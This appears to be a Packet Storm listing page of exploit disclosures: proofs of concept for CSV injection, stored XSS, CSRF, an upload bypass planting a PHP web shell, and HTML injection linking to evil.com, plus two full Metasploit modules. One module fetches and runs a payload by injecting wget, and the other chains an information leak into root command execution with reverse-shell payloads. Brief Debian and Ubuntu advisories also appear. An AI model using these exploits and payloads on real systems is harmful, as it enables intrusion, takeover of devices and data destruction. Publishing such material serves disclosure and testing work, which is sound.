projectSend version r1605 suffers from a CSV injection vulnerability.

    Exploit Title: projectSend r1605 - CSV injectionVersion: r1605Bugs:  CSV InjectionTechnology: PHPVendor URL: https://www.projectsend.org/Software Link: https://www.projectsend.org/Date of found: 11-06-2023Author: Mirabbas AğalarovTested on: Windows2. Technical Details & POC========================================Step 1. login as userstep 2. Go to My Account ( http://localhost/users-edit.php?id=2 )step 3. Set name as  =calc|a!z|step 3. If admin Export action-log as CSV  file ,in The computer of admin  occurs csv injection and will open calculator ( http://localhost/actions-log.php )payload: =calc|a!z|

projectSend r1605 CSV Injection

projectSend version r1605 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: projectSend r1605 - Stored XSSApplication: projectSendVersion: r1605Bugs:  Stored XssTechnology: PHPVendor URL: https://www.projectsend.org/Software Link: https://www.projectsend.org/Date of found: 11-06-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================1. Login as admin2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)3. Go to new JS (http://localhost/custom-assets-add.php?language=js)4. Set content as  alert("xss"); and set public 5. And Save6. Go to http://localhost (logout)payload: alert("xss")POST /custom-assets-add.php HTTP/1.1Host: localhostContent-Length: 171Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/custom-assets-add.php?language=jsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2lConnection: closecsrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head

projectSend r1605 Cross Site Scripting

AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determining which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.

AIDE 0.18.4

Online Examination System Project version 1.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)# Google Dork: n/a# Date: 09/06/2023# Exploit Author: Ramil Mustafayev (kryptohaker)# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Version: 1.0# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28# CVE : n/aOnline Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.To exploit this vulnerability, an attacker needs to do the following:1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:<html>  <body>    <form action="http://example.com/update.php" method="GET">      <input type="hidden" name="demail" value="victim@example.com" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html5. Send the URL of the HTML page to the admin user via email, social media, or any other means.If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.

Online Examination System Project 1.0 Cross Site Request Forgery

Teachers Record Management System version 1.0 suffers from file upload validation bypass vulnerability.

    Exploit Title: Teachers Record Management System 1.0 – File Upload Type ValidationDate: 17-01-2023EXPLOIT-AUTHOR: AFFAN AHMEDVendor Homepage: <https://phpgurukul.com>Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>Version: 1.0Tested on: Windows 11 + XAMPPCVE : CVE-2023-3187===============================STEPS_TO_REPRODUCE===============================1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”Password: Test@123”2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image3. Open the Burp-suite and Intercept the Edit Image Request4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”5. Change the **Content-type from “ image/png “ to “ image/gif “6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**8. Below is the Burpsuite-POST Request for all the changes that I have made above==========================================BURPSUITE_REQUEST==========================================POST /trms/teacher/changeimage.php HTTP/1.1Host: localhostContent-Length: 442Cache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: <http://localhost>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: <http://localhost/trms/teacher/changeimage.php>Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qcConnection: close------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="subjects"John Doe------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"Content-Type: image/gifGIF89a <?php echo system($_REQUEST['dx']); ?>------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="submit"------WebKitFormBoundaryndAPYa0GGOxSUHdF--===============================PROOF_OF_CONCEPT===============================GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md

Teachers Record Management System 1.0 Validation Bypass

Sales Tracker Management System version 1.0 suffers from an html injection vulnerability.

Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities   
Google Dork: NA  
Date: 09-06-2023  
EXPLOIT-AUTHOR: AFFAN AHMED  
Vendor Homepage: <https://www.sourcecodester.com/>  
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>  
Version: 1.0  
Tested on: Windows 11 + XAMPP  
CVE : CVE-2023-3184

==============================  
CREDENTIAL TO USE  
==============================  
ADMIN-ACCOUNT  
USERNAME: admin  
PASSWORD: admin123

=============================  
PAYLOAD_USED  
=============================  
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>

===============================  
STEPS_TO_REPRODUCE  
===============================  
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN   
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`   
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username`   
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON  
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .  
6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE

==========================================  
BURPSUITE_REQUEST  
==========================================  
POST /php-sts/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 1037  
sec-ch-ua:   
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36  
sec-ch-ua-platform: ""  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-sts/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn  
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="id"

------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="password"

1234  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="type"

2  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================  
PROOF_OF_CONCEPT  
===============================  
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

Sales Tracker Management System 1.0 HTML Injection

This Metasploit module exploits an unauthenticated command injection vulnerability in /controller/ping.php in Symmetricom SyncServer. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer::HTML  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.          The S100 through S350 (End of Life) models should be vulnerable to          unauthenticated exploitation due to a session handling vulnerability.          Later models require authentication which is not provided in this module because we can't test it.          The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).          Run 'check' first to determine if vulnerable.          The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT          and LPORT while testing this module.        },        'Author' => [          'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module          'Justin Fatuch Apt4hax', # Exploit PoC          'Robert Bronstein' # Metasploit Module        ],        'References' => [          ['CVE', '2022-40022'],          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']        ],        'DisclosureDate' => '2022-08-31',        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),        OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),        OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])      ], self.class    )  end  def primer; end  def on_request_uri(cli, req)    @pl = generate_payload_exe    print_status("#{peer} - Payload request received: #{req.uri}")    send_response(cli, @pl)  end  def check    uri = '/controller/ping.php'    res = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'vars_post' =>          {            'currentTab' => 'ping',            'refreshMode' => 'dirty',            'ethDirty' => 'false',            'snmpCfgDirty' => 'false',            'snmpTrapDirty' => 'false',            'pingDirty' => 'true',            'hostname' => "\`id\`",            'port' => 'eth0',            'pingType' => 'ping'          }    })    if res && res.body.to_s =~ /uid=0/      Exploit::CheckCode::Vulnerable    else      Exploit::CheckCode::Safe    end  end  def request(cmd)    uri = '/controller/ping.php'    send_request_cgi({      'method' => 'POST',      'Content-Type' => 'application/x-www-form-encoded',      'uri' => uri,      'vars_post' =>      {        'currentTab' => 'ping',        'refreshMode' => 'dirty',        'ethDirty' => 'false',        'snmpCfgDirty' => 'false',        'snmpTrapDirty' => 'false',        'pingDirty' => 'true',        'hostname' => cmd,        'port' => 'eth0',        'pingType' => 'ping'      }    })  end  def exploit    srvhost = datastore['SRVHOST']    srvport = datastore['SRVPORT']    filename = datastore['FILENAME']    resource_uri = '/' + filename    shell_path = '/tmp/'    cmds = [      "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",      "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",      "\`" + shell_path + filename + "\`"    ]    start_service({      'Uri' => {        'Proc' => proc { |cli, req|                    on_request_uri(cli, req)                  },        'Path' => resource_uri      }    })    print_status("#{rhost}:#{rport} - Exploit started...")    print_status("#{rhost}:#{rport} - Sending wget command...")    request(cmds[0])    sleep(3)    print_status("#{rhost}:#{rport} - Making payload executable...")    request(cmds[1])    sleep(3)    print_status("#{rhost}:#{rport} - Executing payload...")    request(cmds[2])    sleep(3)  endend

Symmetricom SyncServer Unauthenticated Remote Command Execution

Debian Linux Security Advisory 5426-1 - An arbitrary file reads from malformed XML payload vulnerability was discovered in owslib, the Python client library for Open Geospatial (OGC) web services. This issue has been addressed by always using lxml as the XML parser with entity resolution disabled.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5426-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 14, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : owslibCVE ID         : CVE-2023-27476Debian Bug     : 1034182An arbitrary file reads from malformed XML payload vulnerbility wasdiscovered in owslib, the Python client library for Open Geospatial (OGC)web services. This issue has been addressed by always using lxml as theXML parser with entity resolution disabled.For the oldstable distribution (bullseye), this problem has been fixedin version 0.23.0-1+deb11u1.We recommend that you upgrade your owslib packages.For the detailed security status of owslib please refer toits security tracker page at:https://security-tracker.debian.org/tracker/owslibFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSJH/AACgkQO1LKKgqv2VQBugf9EQeMoKzsAYfAG6NTgqF9hu5+SMNAlv2IsHzTJZwL8nOpXXhBDq6h2kvYwIScctrpjlJCOulvsYptnVS7hzHt/KqUSXzTap7fg4JxWkpaOylvcLvIwcbPbKSY7KzpWk1mdvePj+ktFaFx/IGKzCD95FGZhMqBhHJc8yPWoZUG3zaL2E8X99gBOVdjFHz6OIhjChaDTGfMr8sV7EpNR5YshFVSeTamysyIGxZe41KWg5mxbnFO8BpIZHWl9Tuz64xhp/QO9SjCDBWbd8zOuoouvaEtXgf8MyJjvPZkTX5PMIFvIVkKP3NHBnH6MUo1mXDUIA7PStjost53yEkU7caRWQ==DwF9-----END PGP SIGNATURE-----

Debian Security Advisory 5426-1

Ubuntu Security Notice 6161-1 - It was discovered that .NET did not properly enforce certain restrictions when deserializing a DataSet or DataTable from XML. An attacker could possibly use this issue to elevate their privileges. Kevin Jones discovered that .NET did not properly handle the AIA fetching process for X.509 client certificates. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6161-1  
June 13, 2023

dotnet6, dotnet7 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in .NET.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime

Details:

It was discovered that .NET did not properly enforce certain  
restrictions when deserializing a DataSet or DataTable from  
XML. An attacker could possibly use this issue to elevate their  
privileges. (CVE-2023-24936)

Kevin Jones discovered that .NET did not properly handle the  
AIA fetching process for X.509 client certificates. An attacker  
could possibly use this issue to cause a denial of service.  
(CVE-2023-29331)

Kalle Niemitalo discovered that the .NET package manager,  
NuGet, was susceptible to a potential race condition. An  
attacker could possibly use this issue to perform remote  
code execution. (CVE-2023-29337)

Tom Deseyn discovered that .NET did not properly process certain  
arguments when extracting the contents of a tar file. An attacker  
could possibly use this issue to elevate their privileges. This  
issue only affected the dotnet7 package. (CVE-2023-32032)

It was discovered that .NET did not properly handle memory in  
certain circumstances. An attacker could possibly use this issue  
to cause a denial of service or perform remote code execution.  
(CVE-2023-33128)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   aspnetcore-runtime-6.0          6.0.118-0ubuntu1~23.04.1  
   aspnetcore-runtime-7.0          7.0.107-0ubuntu1~23.04.1  
   dotnet-host                             6.0.118-0ubuntu1~23.04.1  
   dotnet-host-7.0                      7.0.107-0ubuntu1~23.04.1  
   dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~23.04.1  
   dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~23.04.1  
   dotnet-runtime-6.0                6.0.118-0ubuntu1~23.04.1  
   dotnet-runtime-7.0                7.0.107-0ubuntu1~23.04.1  
   dotnet-sdk-6.0                      6.0.118-0ubuntu1~23.04.1  
   dotnet-sdk-7.0                      7.0.107-0ubuntu1~23.04.1  
   dotnet6                                 6.0.118-0ubuntu1~23.04.1  
   dotnet7                                 7.0.107-0ubuntu1~23.04.1

Ubuntu 22.10:  
   aspnetcore-runtime-6.0          6.0.118-0ubuntu1~22.10.1  
   aspnetcore-runtime-7.0          7.0.107-0ubuntu1~22.10.1  
   dotnet-host                             6.0.118-0ubuntu1~22.10.1  
   dotnet-host-7.0                      7.0.107-0ubuntu1~22.10.1  
   dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.10.1  
   dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.10.1  
   dotnet-runtime-6.0                6.0.118-0ubuntu1~22.10.1  
   dotnet-runtime-7.0                7.0.107-0ubuntu1~22.10.1  
   dotnet-sdk-6.0                      6.0.118-0ubuntu1~22.10.1  
   dotnet-sdk-7.0                      7.0.107-0ubuntu1~22.10.1  
   dotnet6                                 6.0.118-0ubuntu1~22.10.1  
   dotnet7                                 7.0.107-0ubuntu1~22.10.1

Ubuntu 22.04 LTS:  
   aspnetcore-runtime-6.0          6.0.118-0ubuntu1~22.04.1  
   aspnetcore-runtime-7.0          7.0.107-0ubuntu1~22.04.1  
   dotnet-host                             6.0.118-0ubuntu1~22.04.1  
   dotnet-host-7.0                      7.0.107-0ubuntu1~22.04.1  
   dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.04.1  
   dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.04.1  
   dotnet-runtime-6.0                6.0.118-0ubuntu1~22.04.1  
   dotnet-runtime-7.0                7.0.107-0ubuntu1~22.04.1  
   dotnet-sdk-6.0                      6.0.118-0ubuntu1~22.04.1  
   dotnet-sdk-7.0                      7.0.107-0ubuntu1~22.04.1  
   dotnet6                                6.0.118-0ubuntu1~22.04.1  
   dotnet7                                7.0.107-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6161-1  
   CVE-2023-24936, CVE-2023-29331, CVE-2023-29337, CVE-2023-32032,  
   CVE-2023-33128

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.118-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.107-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.118-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.107-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.118-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.107-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6161-1

This Metasploit module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS versions 4.2.29 and below by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information" and CVE-2022-24989, "Authenticated remote code execution". Exploiting vulnerable endpoint api.php?mobile/webNasIPS leaking sensitive information such as admin password hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint api.php?mobile/createRaid with POST parameters raidtype and diskstring to execute remote code as root on TerraMaster NAS devices.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'require 'time'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29          and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"          and CVE-2022-24989, "Authenticated remote code execution".          Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password          hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root          on TerraMaster NAS devices.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Octagon Networks', # Discovery          '0xf4n9x' # POC        ],        'References' => [          ['CVE', '2022-24990'],          ['CVE', '2022-24989'],          ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'],          ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'],          ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990']        ],        'DisclosureDate' => '2022-03-07',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8181,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])    ])  end  def get_data    # Initialise variable data to store the leaked data    @data = {}    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`    # CVE-2022-24990    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),      'headers' => {        'User-Agent' => 'TNAS'      }    })    if res && res.code == 200 && res.body.include?('webNasIPS successful')      # Parse the JSON response and get the data such as admin password hash and MAC address      res_json = res.get_json_document      unless res_json.blank?        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip        @data['key'] = @data['mac'][6..11] # last three MAC address entries        @data['timestamp'] = Time.new.to_i.to_s        # derive signature        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])      end    end  end  def tos_encrypt_str(key, str_to_encrypt)    id = key + str_to_encrypt    return Digest::MD5.hexdigest(id.encode('utf-8'))  end  def execute_command(cmd, _opts = {})    # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`    # CVE-2022-24989    diskstring = Rex::Text.rand_text_alpha_upper(4..8)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'User-Agent' => 'TNAS',        'Authorization' => @data['password'],        'Signature' => @data['signature'],        'Timestamp' => @data['timestamp']      },      'vars_post' => {        'raidtype' => ';' + cmd,        'diskstring' => diskstring.to_s      }    })  end  def get_terramaster_info    # get Terramaster CPU architecture (X64 or ARM64) and TOS version    @terramaster = {}    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')    })    if res && res.body && res.code == 200      # get the version information from the request response like below:      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>      return if res.body.match(/ver=.+?"/).nil?      version = res.body.match(/ver=.+?"/)[0]      # check if architecture is ARM64 or X64      if version.match(/_A/)        @terramaster['cpu_arch'] = 'ARM64'      elsif version.match(/_S/) || version.match(/_Q/)        @terramaster['cpu_arch'] = 'X64'      else        @terramaster['cpu_arch'] = 'UNKNOWN'      end      # strip TOS version number and remove trailing double quote.      @terramaster['tos_version'] = version.split('.0_')[1].chop    end  end  def check    get_terramaster_info    return CheckCode::Safe if @terramaster.empty?    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29')      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")    end    CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")  end  def exploit    get_data    fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager(linemax: 65536)    end  endend

Source

Packet Storm